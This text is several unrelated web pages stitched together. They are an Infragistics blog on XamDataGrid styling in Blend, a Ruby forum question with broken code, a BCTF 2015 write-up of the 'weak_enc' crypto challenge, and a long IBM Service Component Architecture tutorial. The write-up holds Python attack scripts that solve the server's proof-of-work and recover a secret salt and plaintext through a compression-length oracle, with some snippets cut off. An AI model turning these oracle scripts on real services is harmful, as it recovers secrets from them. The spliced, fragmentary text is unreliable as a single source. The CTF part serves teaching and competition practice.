To assign a non-XamEditor control to the cell value presenter, we will need to create a DataTemplate which hooks up this control. In the Style editor, the breadcrumb control at the top of the designer provides a menu for doing just that. At the top of the designer, a control will show a palette menu next to the CellValuePresenter label. This will show all the template editors available for this style. Select the second template editor for editing the ContentTemplate. From here create an empty template. In the Create DataTemplate Resource dialog, add the following style name: 'ColorCellDataTemplate'.

Blend places the designer in edit mode for the DataTemplate. Add the XamColorPicker control from Assets to the DataTemplate Grid. After making sure the XamColorPicker is selected in the Objects and Timeline panel, locate the SelectedColor property in the XamColorPicker Properties category. Next go to the SelectedColor Advanced Options and choose the Data Binding option. In the Create Data Binding dialog, make sure the Data Context tab is selected and add the following text to the 'Use a custom path expression' field:

Value

Also make sure all Layout properties are set to default. Blend will probably set the HorizontalAlignment to Left, which will end in confusing results, so it is important that both the Horizontal and Vertical alignments are set to Stretch.
Return scope to the Window layout and delete the temporary CellValuePresenter from the LayoutRoot. To assign the style to the ColorKey field, return to FieldLayouts for the XamDataGrid and Fields for the FieldLayout. Select the second-to-last Field in the Field Collection Editor dialog. Add New Settings for the ColorKey field. Locate the CellValuePresenterStyle property and select Advanced Options. Advanced Options will allow us to select the ColorKeyCellStyle from the Local Resources option.

There is one last caveat to work around. Blend always uses the DynamicResource keyword when assigning styles, and you may encounter a problem with assigning a CellValuePresenter style using DynamicResource at run time. Since the style is defined locally, we can change DynamicResource to StaticResource. You can do this in the XAML, or by simply choosing the Custom Expression option in Advanced Options. Since we already assigned the local resource, the Custom Expression field will show the expression. Here change DynamicResource to StaticResource.

Dismiss the open dialogs by pressing OK and run the application. You will find the XamColorPicker displaying the color in the ColorKey field. In the Data panel you can customize the sample data by adding more records. If your elements do not show up, there may be a typo in the XAML or a style was not assigned correctly. If elements show up but are oddly placed, then a Layout property was assigned that needs to be cleared. I've attached the project for reference.

In spite of a few caveats when working with custom styles in Blend, having Blend automate the generation of the XAML limits XAML typos, and it is useful in that Blend will display properties and event names and provides specialized editors for working with styles and templates.
In my next killer blog I will demonstrate applying styles to override background, highlight and hover brushes for cells, header labels, and row summaries as well as how to override text styles for cells and labels. XDG101.zip
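For reference, the field layout assembled through the dialogs in this article corresponds to XAML along these lines. This is a reconstructed sketch from the field names, labels, and widths listed above; Blend's actual generated markup may differ in detail:

```xaml
<igDP:XamDataGrid DataSource="{Binding Collection}">
  <igDP:XamDataGrid.FieldLayoutSettings>
    <igDP:FieldLayoutSettings AutoGenerateFields="False" />
  </igDP:XamDataGrid.FieldLayoutSettings>
  <igDP:XamDataGrid.FieldLayouts>
    <igDP:FieldLayout>
      <igDP:FieldLayout.Fields>
        <igDP:Field Name="Icon" Label=" " Width="30" Height="30" />
        <igDP:Field Name="ProductName" Label="Product Name" Width="160" />
        <igDP:Field Name="ForSale" Label="For Sale" Width="70" />
        <igDP:Field Name="ID" Label="ID" Width="60" />
        <igDP:Field Name="ColorKey" Label="Color Key" />
        <igDP:Field Name="Price" Label="Price" Width="70" />
      </igDP:FieldLayout.Fields>
    </igDP:FieldLayout>
  </igDP:XamDataGrid.FieldLayouts>
</igDP:XamDataGrid>
```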
https://www.infragistics.com/community/blogs/b/curtis_taylor/posts/xamdatagrid-101-part-1
Hello, I'm trying to use some methods I'm defining in a module in both a model and my rake task. How can I do this? Any help would be appreciated. I've currently got the following, but my rake task can't access the methods in my module. Instead, I get:

undefined local variable or method `report_csv_process' for #<Object:0x284f9e8>

/lib/module/order_process:

```ruby
module order_process
  def process_order(id)
    #do stuff
  end
end
```

/lib/tasks/ordering.rake:

```ruby
include order_process

namespace :send_report do
  task :order => :environment do
    process_order(id)
  end
end
```

/app/models/segment.rb:

```ruby
class Segment < ActiveRecord::Base
  include report_csv_process

  bla bla
end
```
https://www.ruby-forum.com/topic/184401
CC-MAIN-2018-09
refinedweb
324
60.72
The challenge was fairly self-explanatory, thankfully: a link for a download, a cipher text to crack, and an IP / port where a server can be reached.

We also see it uses a salt as part of the encryption function, and that the salt is not included in the files we downloaded. It imports "SALT" from a python module "grandmaToldMeNotToTalkToBigBadWolf":

```python
import hashlib
import string
from grandmaToldMeNotToTalkToBigBadWolf import SALT

DEBUG = False
MSGLENGTH = 40000
```

Cool. Let's create an arbitrary salt file for now so we can see the service in action:

```
root@mankrik:~/bctf/weak# echo SALT=\'abcd\' > grandmaToldMeNotToTalkToBigBadWolf.py
root@mankrik:~/bctf/weak# python weak_enc-40eb1171f07d8ebb06bbf36849d829a1.py
```

Let's connect to it and see what happens:

```
root@mankrik:~# nc localhost 8888
Please provide your proof of work, a sha1 sum ending in 16 bit's set to 0, it must be of length 21 bytes, starting with QN+yjqWfMwADrUsv
test
Check failed
```

Ok, before we can even access the encryption server, we have a riddle to solve? We must solve this riddle to proceed, because I have a feeling that, even though we have the full code of the encryption algorithm, without the salt we will never decrypt the challenge. The only way we're getting the salt is through the live BCTF server. So we need to pass this test.

As it turns out, this is a fairly standard riddle used in CTF competitions. We solve it using a brute-force approach, using the Python itertools module to build every possible combination of characters and test for combinations that meet the requirements. I have reused code from this link with some modifications for our particular circumstances below:

```python
proof = puzzlefromserver()
```

The output of the snippet above is a string in the variable "test" that meets the criteria demanded of us by the server. So it's time to start whipping up a client to begin probing our way through the encryption part of this crypto challenge.

For this I'm using Binjitsu, which I am still learning and finding great features in every day. The first thing I want to do is just connect, pass the riddle, and get to the Encryption service. Let's use this code to do that:
For this I'm using Binjitsu, which I am still learning and finding great features in every day. The first thing I want to do is just connect, and then pass the riddle and get to the Encryption service. Let's use this code to do that: #!/usr/bin/python from pwn import * import hashlib, itertools # This is the plaintext we are going to encrypt plaintext = 'a' * 1 conn = remote('localhost',8888) #conn = remote('146.148.79.13',8888) task = conn.recvline() line = task.split() proof = line[25] print "Got challenge ("+proof+"). Brute forcing a response..."() print "Responding to challenge..." conn.send(test) conn.sendafter(':', plaintext + "\n") encrypted = conn.recvline() line = encrypted.split() print "Plaintext "+plaintext+" encrypted is "+line[3] conn.close() And when we run it... root@mankrik:~/bctf/weak# python pwnweak.py.p1 [+] Opening connection to localhost on port 8888: Done Got challenge (3REpDAwCe+Mmxb85). Brute forcing a response... Responding to challenge... Plaintext a encrypted is Q0isU8Y= [*] Closed connection to localhost port 8888 Ok cool we're in! And now I have a script I can encrypt anything with. That's step 1. Next we need to figure out a way to approach the deduction of the salt. Let's browse the server code some more. def LZW(s, lzwDict): # LZW written by NEWBIE for c in s: updateDict(c, lzwDict) print lzwDict # have to make sure it works result = [] Notice here we have a LZW function which is a lossless compression algorithm. Whether this algorithm implements true LZW or not is not important. What is important is that it's a compression algorithm (presumably) and that's cool because compression gives us interesting results when encrypting. The idea I'm using here, is that, when you add a salt to a plaintext and compress them before encryption, if the plaintext and the salt have common factors then the ciphertext will be of a unexpected, and shorter, length. 
Let's take this oversimplified example:

Case #1
- Salt: beef
- Plaintext: aaaaaa
- Ciphertext: AzTzDa

Case #2
- Salt: beef
- Plaintext: eeeeee
- Ciphertext: TrZw

We try this in our "lab" environment by modifying our Python code with a for loop. From the server code we know the salt can only contain lowercase letters a-z, because it checks for that, so that's cool. Let's iterate through the characters a-z against our lab, where we've configured the salt "abcd", and see what happens! Here's a link to the full code of this version.

```python
# iterate through lowercase letters
for letter in range(97, 122+1):
    plaintext = chr(letter) * 10
    conn = remote('localhost', 8888)
```

Then let's run our code against our lab server. I'm only interested in seeing the encrypted results, so I'll grep for "encrypted":

```
root@mankrik:~/bctf/weak# python pwnweak.py.p2 | grep encrypted
Plaintext aaaaaaaaaa encrypted is Q0isU8aHWYY=
Plaintext bbbbbbbbbb encrypted is Q0isU8eHWYY=
Plaintext cccccccccc encrypted is Q0isU8SHWYY=
Plaintext dddddddddd encrypted is Q0isU8GHWY8=
Plaintext eeeeeeeeee encrypted is Q0isU8KGWoc=
Plaintext ffffffffff encrypted is Q0isU8KGWoc=
Plaintext gggggggggg encrypted is Q0isU8KGWoc=
Plaintext hhhhhhhhhh encrypted is Q0isU8KGWoc=
Plaintext iiiiiiiiii encrypted is Q0isU8KGWoc=
Plaintext jjjjjjjjjj encrypted is Q0isU8KGWoc=
```

Wow, check that out. For the letters a-d the encrypted output differs, but for all other letters the ciphertext is the same. So we deduce the salt contains the letters a, b, c, and d. Cool. Let's do this against the production server! They can't mind just 26 connections, surely!
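The length leak behind this trick is easy to reproduce offline with any compressor. The sketch below substitutes zlib for the challenge's homemade LZW (so the exact numbers differ, but the effect is the same), and assumes, as the equal-length ciphertexts in each class suggest, that the cipher preserves the compressed length:

```python
import zlib

SALT = b"abcd"  # the lab salt; stands in for the secret

def ciphertext_len(plaintext: bytes) -> int:
    # The server compresses salt + message before encrypting; with a
    # length-preserving cipher, the compressed length is what leaks.
    return len(zlib.compress(SALT + plaintext))

overlap = ciphertext_len(b"abcd" * 3)      # repeats the salt's bytes
no_overlap = ciphertext_len(b"wxyz" * 3)   # shares nothing with the salt
assert overlap < no_overlap                # salt-like input compresses better
```

Both inputs are the same length, so the difference in output length comes entirely from how much the plaintext shares with the salt, which is exactly the signal the letter-by-letter probing exploits.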
```
Plaintext gggggggggg encrypted is NxQ1NDIZcTY/5HkaBS4t
Plaintext hhhhhhhhhh encrypted is NxQ1NDIZcTY/5HkaBS4t
Plaintext iiiiiiiiii encrypted is NxQ1NDMYcDcw53gfGi8u
Plaintext jjjjjjjjjj encrypted is NxQ1NDIZcTY/5HkaBS4t
Plaintext kkkkkkkkkk encrypted is NxQ1NDMYcDcw53gcGi8u
Plaintext llllllllll encrypted is NxQ1NDIZcTY/5HkaBS4t
Plaintext mmmmmmmmmm encrypted is NxQ1NDIZcTY/5HkaBS4t
Plaintext nnnnnnnnnn encrypted is NxQ1NDMYcDcw53geGi8u
Plaintext oooooooooo encrypted is NxQ1NDMYcDcw53gdGi8u
Plaintext pppppppppp encrypted is NxQ1NDIZcTY/5HkaBS4t
Plaintext qqqqqqqqqq encrypted is NxQ1NDIZcTY/5HkaBS4t
Plaintext rrrrrrrrrr encrypted is NxQ1NDIZcTY/5HkaBS4t
```

Excellent, we're making progress. We know a couple of things from this:

- We know the salt is much longer than our "lab" salt, because the ciphertext is much longer for the same input.
- We also know that the salt must contain the letters "i", "k", "o", and "n". All other ciphertexts remain the same.

Where to go from here? It is next possible to deduce the position of each byte in the salt by examining the individual bits in the ciphertext output. That is complicated, though, so is there anything we can do to quickly brute-force this? I got the idea from a colleague to assume that the salt fits the basic rules of an English-language word, build a list of anagrams using the "ikon" letters, then apply them as salts in the server code until I reach a decryption of a known plaintext that matches a known ciphertext from the production server.

So we know:

- The string "gggggggggg" encrypts to "NxQ1NDIZcTY/5HkaBS4t".
- The salt is > 4 bytes
- The salt contains the characters i, k, o and n

We assume:

- The salt is an English word, or at least a string made up of words following the rules of the English language (i.e.
no "ooo" sequences). So I made these modifications to the server code, which basically takes a plaintext from the client, then brute forces every combination of the 15 four-letter arrangements of the letters i, k, o and n I came up with and sends them to the client:

    ...
    def encrypt(m,salt):
        lzwDict = dict()
        toEnc = LZW(salt + m, lzwDict)
        key = hashlib.md5(salt*2).digest()
    ...
    print "looking for salts"
    koala = ('ikon', 'ionk', 'inok', 'onik', 'oink', 'nino', 'nini',
             'niko', 'koni', 'koin', 'kino', 'niok', 'noik', 'noki', 'niko',)
    for findsalt in itertools.product(koala, repeat = 5):
        salttry = '{}{}{}{}{}'.format(*findsalt)
        print "Salt: " + salttry
        encd = encrypt(msg, salttry)
        print "Encrypted: " + encd
        req.sendall(salttry + ":" + encd + "\n")
    ...
    # This is the plaintext we are going to encrypt
    plaintext = 'g' * 10
    conn.sendafter(':', plaintext + "\n")
    while True:
        encrypted = conn.recvline()
        print "Response: " + encrypted

Then we run it until we get a string containing the known good ciphertext we previously retrieved from the production server, "NxQ1NDIZcTY/5HkaBS4t". Within 3 minutes we got the following output:

    root@mankrik:~/bctf/weak# time python pwnweak.py.p3 | grep NxQ1
    Response: inokonikniokonikoink:iJykNxQ1QNqCzMLoilrI580hIg==
    Response: niniinokniniionkikon:Q3LUXv0lUVNxQ1dZV1WUYF9W
    Response: nikonikoninikonikoni:NxQ1NDIZcTY/5HkaBS4t

Congrats, we now know the salt used to encrypt on the production server is "nikonikoninikonikoni". That's step 2 done! This challenge is not solved yet though. We have a message to decrypt next. So taking what we know now, how can we apply this to decryption? I first thought to analyse the encryption and compression functions, but before I got too far I noticed just how closely the encrypted versions of the long strings of n, i, k, and o matched the decryption challenge.
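As a back-of-the-envelope check on why this exhaustive search finishes so quickly, we can count the candidate salts (this calculation is mine, not part of the original exploit):

```python
import itertools

# The 15 four-letter chunks used above to assemble candidate salts.
koala = ('ikon', 'ionk', 'inok', 'onik', 'oink', 'nino', 'nini',
         'niko', 'koni', 'koin', 'kino', 'niok', 'noik', 'noki', 'niko')

# Five chunks per 20-character candidate salt -> 15**5 combinations.
total = sum(1 for _ in itertools.product(koala, repeat=5))
print(total)  # 759375
```

Hashing and testing 759,375 candidates is cheap work for a modern machine, which is why the brute force completes within minutes.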
For example, from earlier we know:

- Challenge ciphertext: NxQ1NDMYcDcw53gVHzI7
- 10 n's ciphertext: NxQ1NDMYcDcw53geGi8u
- 10 letters not in the list i,k,o,n: NxQ1NDIZcTY/5HkaBS4t

Notice that the ciphertext for letters in the list i, k, o, n is correct up until the last 5 bytes of the challenge ciphertext. Can we apply our salt brute force technique to the challenge for a quick win? Firstly, let's set our server code back to "stock" and configure our SALT correctly now that we know it. Next we'll modify the client code to again use a loop to continuously ask our localhost server to encrypt values. This time our plaintext will iterate through the blocks of 4 characters we used previously to find the salt. You can view the client code we used at this link. We started with a plaintext of 4 bytes, then increased it in blocks of 4 bytes until we had this code, which looked for 12-byte plaintexts:

    import hashlib, itertools
    # list of possible plaintext combinations
    pool = ('ikon', 'ionk', 'inok', 'onik', 'oink', 'nino', 'nini',
            'niko', 'koni', 'koin', 'kino', 'niok', 'noik', 'noki', 'niko',)
    # iterate through the combinations
    for findsalt in itertools.product(pool, repeat = 3):
        plaintext = '{}{}{}'.format(*findsalt)
        conn = remote('localhost', 8888)

When run, we received a result in just over 2 minutes. We confirmed the string NxQ1NDMYcDcw53gVHzI7 is the result of encrypting the plaintext "nikoninikoni".

    root@mankrik:~/bctf/weak# date; python pwnweak.py.p4 | grep NxQ1NDMYcDcw53gVHzI7
    Monday 23 March 20:28:18 AEDT 2015
    Plaintext nikoninikoni encrypted is NxQ1NDMYcDcw53gVHzI7
    ^C
    root@mankrik:~/bctf/weak# date
    Monday 23 March 20:30:35 AEDT 2015

Woot. That's the third and final step to this challenge. We submit the flag and get the 200 points.
A good challenge with many new steps for me; using deduction and brute force together was very fun. Thanks to the BCTF team. Writeup: Dacat
http://capturetheswag.blogspot.jp/2015/03/bctf-2015-weakenc-crypto-challenge.html
Service Component Architecture

Service Component Architecture (SCA) is a framework for solving one of the most basic issues relating to building distributed SOA applications. Imagine you have an external application that exposes itself as a callable service. You now wish to write a new application that calls the external service. How do you go about doing this? You could look at how the external application is to be called, and you will find that it will likely be Web Services, JMS, MQ, REST, EJB or some similar technology. You could then code your new application using the correct API and all will work. Well … it will work for a time. You have introduced a hard dependency here. You have bound your application to a specific protocol and associated endpoint for the remote application you are calling. If the nature of the service provider application changes, such as its location, its communication protocol or its parameters, then the service caller will also need to be reworked. This means that the coupling between the caller and the provider is tight. Given that it is our desire to be loosely coupled and agile to change, maybe we can do better.

At its most simplistic level, SCA provides an abstraction between a service caller and a service provider. The service caller doesn't actually care about how the provider is called, only that when it is time to invoke the services of the provider, the provider is then called. SCA provides just such a loose coupling. Instead of the service caller invoking the service provider directly, the service caller asks SCA to invoke the service provider. In turn, SCA then makes the actual call to the service provider using the configured protocol, endpoints and parameters. At first glance, this doesn't appear to solve any problems … but if we look closer we see that something wonderful has happened. The service caller, which is custom-written logic, now no longer needs to know mechanical information about the service provider.
Instead, the caller asks SCA and SCA does the work on behalf of the caller. At the SCA level, the binding of protocols and endpoints is configured at a very high level without coding. Importantly, if the details of the service provider change, the service caller application (which, if we remember, is business logic) is unaffected. Only the binding details at the SCA level need to be reworked.

The question now becomes one of how to actually use this SCA concept. I'll start by saying that SCA is rich in function. This means that there is a lot of stuff in there. However, try not to let the Boeing 747 cockpit array of levers and switches deter you from realizing the benefits. We will take it slowly and carefully and expose the parts that are needed as we need them.

Let us start with what SCA actually is from a product perspective. SCA is a runtime framework that separates callers from called services. A caller no longer calls the target service directly but instead asks SCA to call the service on its behalf. To achieve this, a "proxy" is put in place of the target service. This proxy is configured with the actual knowledge of how to invoke the real target service. The proxy is identified with a name. When the caller wishes to invoke the target service, it asks SCA to invoke the target by passing in the name of the proxy. We have thus decoupled the caller from the target service provider.

Somewhere the rubber must meet the road and some definitions have to be made. SCA asks for these definitions as an XML document that describes/declares the definitions. The format of the XML is defined by an XML Schema and conforms to an SCA specification called the Service Component Definition Language (SCDL). Thankfully, this XML is merely an academic part of the story, as we will never see it. I explain it here only for your understanding. The SCA XML is (for our discussion purposes) interpreted at run time.
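To make this less abstract, here is a hand-written fragment in the spirit of SCDL (simplified and illustrative only — the component name, class and URI are invented, and the real schema carries many more attributes):

```xml
<component name="CustomerOrder">
  <!-- The implementation this component is a placeholder for -->
  <implementation.java class="com.example.CustomerOrderImpl"/>
  <!-- A reference wired to an external provider via a Web Service binding -->
  <reference name="ChargeCreditCard">
    <binding.ws uri="http://billing.example.com/ChargeService"/>
  </reference>
</component>
```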
When a caller says that it wishes to invoke a service with a name of "XYZ", the SCA runtime will parse the XML looking for the definition of "XYZ". This definition will include such things as what protocol to use to connect to the back-end service, where the service is located and a host of additional (and optional) attributes.

I mentioned that we will never have to work with the SCA XML directly, so how then do we describe the environment we wish to achieve to SCA? The answer is to use the IBM development environment called Integration Designer (ID). Integration Designer is a full IDE, previously called WebSphere Integration Developer (WID). It is based on Eclipse and looks familiar to users of other Eclipse-based products. Within ID, we create modules, which are really projects. Each module contains a description of a single SCA environment, the piece parts that are to be integrated and details of how those parts are configured together. The description of the SCA environment is called the Assembly Diagram. ID provides a dedicated editor for creating and modifying the contents of this diagram. Imaginatively, the editor is called the Assembly Diagram Editor. Using this visual editor, the relationships between components can be wired together. As you may have already guessed, the diagram is basically a visual representation of the SCA XML document that is used to control SCA operations. The Assembly Diagram Editor is rich enough that users need never edit the raw XML files by hand. In fact, ID goes out of its way to hide those from you so that all you ever see is the assembly diagram.

The Assembly Diagram can be opened from the module view. Once opened, a drawing canvas can be seen which shows the diagram area: This is the mechanical aspect of working with SCA; now we turn our attention to the things that can be wired together on that canvas. Experience has taught me that this can be one of the more subtle concepts to get across, so we will take our time here.
Within the SCA story there are basically two types of things that can be described. One type is code that will actually run on and within IBPM. This includes BPEL processes, Java code, and a variety of other goodies we have not yet had a chance to discuss. To help set the scene, imagine that we want to code a fragment of Java that will execute inside IBPM and that we want this Java code to call an external service. The Java code will be written and contained inside what SCA calls a component. A component is a unit that is self contained and acts as a place holder for its implementation. From an SCA perspective, a finite set of SCA component types is available. Specifically, these are: We won't go into details on each of the component types here. Instead, there will be much written on them in subsequent sections. For now, let us simply realize that components are building blocks in the SCA diagram.

As an illustration, let us look at a Java Component. When added to the canvas area, it looks as follows: Each of the component types has a unique icon associated with it. Every SCA component has a name that is unique to the module in which it lives. In this example, the component is called MyJavaComponent. On the Assembly Diagram, the visual box that is the component can be thought of as a container or holder for its actual content. We can drill down into a component to see what is inside it. In this instance, if we open it up, we would see Java code. If we had a BPEL process, we would see a BPEL process.

Now we get to take the next leap. Imagine that we have created a number of components on our Assembly Diagram where each component has a discrete and self-contained purpose. This is not yet a solution … what we would have created would be a set of building blocks that we could construct our solution from. To build the solution we would need to connect the building blocks together to perform a bigger task.
For example, if we had a component that charges a credit card and a component that receives a customer order, we may wish for the order processing to invoke the services of the credit card charging. To describe this to SCA, we can draw wires from one component to another. This is illustrated in the next diagram: It is important to understand that at the SCA layer, we are not describing flow control. Instead, what we are saying here is that the component called CustomerOrder can (if it chooses) call another component called ChargeCreditCard. We are not saying that it will, must or does … simply that if it wants to, it can. Going further, the CustomerOrder component may invoke a service (another component) that ships product to a customer. The assembly for this may look like:

SCA Interfaces and References

Every SCA component is capable of being invoked (called) by another. This means that the component has to be able to describe what it is capable of doing and what it expects as input should it be called. Consider a component that charges a credit card. What does it expect as input? These inputs are not prescribed by the caller; they are prescribed by the implementation of the credit card processing function or service. An example of input might be: These parameters are not negotiable. In order to use the credit card service, they must be provided. This can be thought of as a contract between the credit card service provider and anyone who may want to call it.

Another analogy may also help to make this concrete. In the Java programming language there is a concept called a Java Interface. The Java Interface describes the methods and the parameters of those methods as well as the return types. The Java Interface does not describe how the methods are implemented … that is up to the Java programmer to decide. The Java Interface does, however, describe the relationship between a calling Java class and an implementation of a class that conforms to the Interface.
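The Java analogy can be made concrete with a small sketch (the interface name, method and return convention here are invented for illustration — they are not part of any IBM API):

```java
// The contract: what any credit-card charging service must offer.
// Callers compile against this interface, never a concrete class.
interface CreditCardService {
    // Returns an authorization code on success.
    String charge(String cardNumber, String expiry, double amount);
}

// One possible implementation; the contract says nothing about this.
class TestCreditCardService implements CreditCardService {
    public String charge(String cardNumber, String expiry, double amount) {
        if (amount <= 0) {
            throw new IllegalArgumentException("amount must be positive");
        }
        // Echo the last four digits back as a fake authorization code.
        return "AUTH-" + cardNumber.substring(cardNumber.length() - 4);
    }
}
```

Just as with an SCA interface, a caller holding a CreditCardService can be handed any conforming implementation without change.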
This latter example is close to what we find in SCA. Every component in SCA exposes an Interface that describes the operations that can be requested of it. Each operation describes its expected input parameters and the nature of the parameters returned. It needs to be quickly stated that the Interface is not described as Java … that would be too low level. Instead, the interface is described in an (arguably) complex language called WSDL (Web Services Description Language). However … IBPM ID hides the WSDL from you and exposes a full-function interface description editor that removes all the complexity.

Let us review what we know so far. When we want to create an SCA component, we will build an interface that abstractly describes the contract that the component will expose, which will include one or more operations. Each operation will have one or more input parameters and return zero or more output parameters. When we create an SCA component, we define the type of component that it is (e.g. Java, BPEL, Mediation) and we associate an interface with that component. When we finally get around to implementing the component, both the type and the interface associated with it will govern the nature of the implementation.

In the Assembly Diagram, the purple circle on the left with the capital letter "I" contained within is used to represent the interface possessed by the component. If we hover the mouse over the interface, a pop-up appears showing us the name of the interface implemented by the component. The interface that a component provides is like a socket, and a reference that connects into that component is like a plug. If we sit and think about this for a while, an elegant and important concept comes to mind. Since one component provides an interface and another component that wishes to call the first provides a reference, unless both components agree on the same description of the interface, it is impossible for the two components to be wired together accidentally.
SCA enforces this desirable policing. To wire two components together, the Assembly Diagram Editor allows us to draw a visual link between the two components. This clearly illustrates to us the relationship between them. There is one further idea here that I want to bring to the surface. When a component wishes to invoke another component, the calling component sends the request not to the other component directly, but instead passes the request to its own local reference. At this point, SCA kicks in and the Assembly Diagram is consulted. Whatever a component's reference is wired to is where the request will be sent. This means that the calling component is loosely coupled to the component that provides the service. At any time, the developer can rewire the relationship between a service caller and a service provider to point to a different service (with the same interface) and this will be honored. Another way of saying this is that the calling SCA component has no idea at development time who, what or where the request will be delivered to. All it sees is the contract advertised through the interface. This is SOA in its ultimate form.

The SCA Import Component

So far we have touched upon one SCA component calling another where both components are hosted inside the SCA framework. In practice, this is rarely sufficient. Most solutions involve services that are hosted outside of a single SCA environment. For example, there may be a service that processes credit card billing that is exposed as a Web Service somewhere else in your organization. You may want to perform a ZIP code lookup which is owned by an external agency. The service you are calling may be hosted by CICS on a mainframe or accessed via WebSphere MQ. Simply calling from one SCA component to another inside the SCA environment is not sufficient. Fortunately, SCA comes to our aid yet again with an additional concept called the SCA Import.
The SCA Import can be thought of as a proxy for communicating with a service that exists outside of our local environment. On the Assembly Diagram, it looks as follows: Notice its distinctive icon. Just like other SCA components, the SCA Import exposes an interface definition. This means that it can be wired to another component's SCA reference. Unlike other components, the SCA Import does not have a native implementation. Instead, when it is called, it is responsible for building a network request in a specific format and protocol and transmitting that request to the external system. When a developer adds an SCA Import to the diagram, they are also responsible for binding that component to an external system. Putting it another way, the act of binding performs the following: There is much more to be said about the SCA Import component. Each of the different protocol types has its own story and parameters, and these will be described later, but for now it is sufficient to understand that the SCA Import is a proxy to a real external service.

Once again we see that through the loose binding of SCA wiring with its interfaces and references, the caller has no idea that the request is going external. When the caller sends its request, that request surfaces at the reference and, depending on how the developer has wired the diagram, the request will flow to the target component. If that component happens to be an SCA Import, then the configuration of the SCA Import will be honored and the request transmitted externally to the target. If at some later date the target changes location or other nature, the SCA Import need only be reconfigured and all will be well. The business logic of the caller need have no knowledge of changes to the target. Again, a perfect "separation of concerns". The choice of name for the proxy has always caused confusion. Why is it called "Import"? The relatively simple answer is that we are importing the services of an external provider.
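The proxy-and-wiring idea can be mimicked in a few lines of plain Java (a conceptual illustration only — the real SCA runtime resolves wires from the SCDL, and all of these class names are invented):

```java
import java.util.HashMap;
import java.util.Map;

// The contract both sides agree on.
interface BillingService {
    String charge(double amount);
}

// A component implemented locally inside the module.
class LocalBilling implements BillingService {
    public String charge(double amount) { return "local:" + amount; }
}

// Stand-in for an SCA Import: same contract, but the implementation
// would marshal the request to an external endpoint over SOAP, JMS, etc.
class RemoteBillingImport implements BillingService {
    private final String endpoint;
    RemoteBillingImport(String endpoint) { this.endpoint = endpoint; }
    public String charge(double amount) {
        return "remote[" + endpoint + "]:" + amount;
    }
}

// Stand-in for the assembly diagram: reference names wired to providers.
class Assembly {
    private final Map<String, BillingService> wiring = new HashMap<>();
    void wire(String reference, BillingService target) {
        wiring.put(reference, target);
    }
    BillingService resolve(String reference) {
        return wiring.get(reference);
    }
}
```

A caller only ever asks the assembly to resolve the name "Billing"; rewiring that name from LocalBilling to RemoteBillingImport changes where requests go without touching the caller.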
More on this naming later after we speak about SCA Exports.

The SCA Export Component

There is one further SCA component that we must address before we go too much further. This component is called the SCA Export. From a diagramming perspective, it looks as follows: Again, note its distinctive icon. The purpose of the SCA Export is to expose an entry point into a module so that an external caller can invoke the logic contained in the module. We have already seen that an SCA assembly can be used to wire together various pieces of function to achieve a business goal, but we have skipped the idea of how the components contained within the diagram are initially started. Components contained in an SCA Assembly Diagram are not exposed to be called directly from outside the diagram. What happens inside the SCA diagram is private (from the callers). To allow external access, we insert an SCA Export component. Just like other components, it has an interface associated with it. It is this interface that is exposed to the outside world. In addition to having an interface, the SCA Export always has a reference attached to it which is of exactly the same type as its exposed interface. This reference can then be wired to other down-stream SCA components. Similar to the SCA Import, the SCA Export acts as a proxy. When it is configured by the developer, it declares a communications protocol (Web Services, MQ, SOAP, etc.) that it is willing to listen upon. When the module containing the diagram is deployed for execution, the module is examined looking for export components. For each one found, the runtime automatically starts listening for incoming requests. When a request is received, a new instance of the module is started and control is given to the component to which the export is wired. Once again we see loose coupling at work. An SCA component has no idea who has called it, only that it has been called.
This means that the export component hides from other SCA components the details of how a request was received. A diagram can have multiple SCA Exports. Each different export could be bound to a different protocol, allowing the business function as a whole to be exposed through a variety of technologies.

SCA Interfaces

When we started the discussion of SCA we quickly found that components have interfaces and may have references. Both of these are described using Interface descriptions. It was also mentioned that the interface descriptions are themselves WSDL files under the covers. Now it is time to look at how an interface is described to SCA. In a module, each interface defined is a named entity. When created or opened, the interface has its own editor called the Interface Editor. When we create a new Interface from scratch, a wizard page is displayed to us that looks as follows: Within this page, we can enter the name that we wish to give the interface. This name combined with its namespace must be unique. Once a new interface has been created or an existing interface opened, the Interface Editor is shown. The editor shows two primary sections. One is an Interface section that shows the nature of the interface as a whole, while the second section shows the operations exposed by that interface. Each operation is a possible entry point into the component described by the interface. When initially created, the interface has no operations defined on it. We can add operations by clicking on the add operation buttons: When an operation is defined, the properties for the operation can be changed. These include: Once the operations have been defined and any changes made, the interface may be saved. Saving an interface results in the actual WSDL file that the interface represents being written. Again, under the covers the interface is described in the deeply technical WSDL language, yet we need never look at the interface from that perspective.
In the vast majority of cases, we need only ever work with the Interface through the logical perspective as shown through the Interface Editor. Only the runtime execution cares that an interface is actually a mechanical WSDL file. When we add a new SCA component onto the Assembly Diagram canvas, it has no interface or references associated with it. If we hover the mouse over the component, a pop-up appears from which we can add and select the interfaces we wish:

SCA Business Objects

When we looked at SCA Interfaces, we saw that each operation in the interface may have multiple input and output parameters and that each parameter has a data type associated with it. The list of data types available includes the usual suspects: strings, integers, floating points, dates, times, etc. However, it is extremely common to want to create our own complex data types. These complex data types are collections of named fields which themselves have their own data types. For example, a customer will commonly have an address. We could create parameters on our interface for each of the expected items such as street, city, state and zip code, but this is not as convenient as creating a single parameter that represents an address as a whole. In SCA, these complex and structured data types are called Business Objects. Within the ID tooling, we can create our own named Business Objects and give them fields with the names and data types that we desire. Under the covers, the Business Object is physically represented by an XML Schema Definition file but, just like with interfaces and WSDL, ID provides an elegant editor to hide this technical detail from us. The end result is an editor called the Business Object editor that provides all the capabilities we desire while at the same time hiding deeply technical constructs that, the majority of the time, we have no use for. Similar to Interfaces, Business Objects are first-class entities and exist in the Data Types folder.
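Since a BO is physically an XML Schema type, a hand-written equivalent of the Address example might look like this (the target namespace and element names are illustrative; the editor generates the real file for you):

```xml
<xsd:schema xmlns:xsd=""
            targetNamespace="http://example.org/bo">
  <!-- The Address Business Object as a complex type of named fields -->
  <xsd:complexType name="Address">
    <xsd:sequence>
      <xsd:element name="street"  type="xsd:string"/>
      <xsd:element name="city"    type="xsd:string"/>
      <xsd:element name="state"   type="xsd:string"/>
      <xsd:element name="zipCode" type="xsd:string"/>
    </xsd:sequence>
  </xsd:complexType>
</xsd:schema>
```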
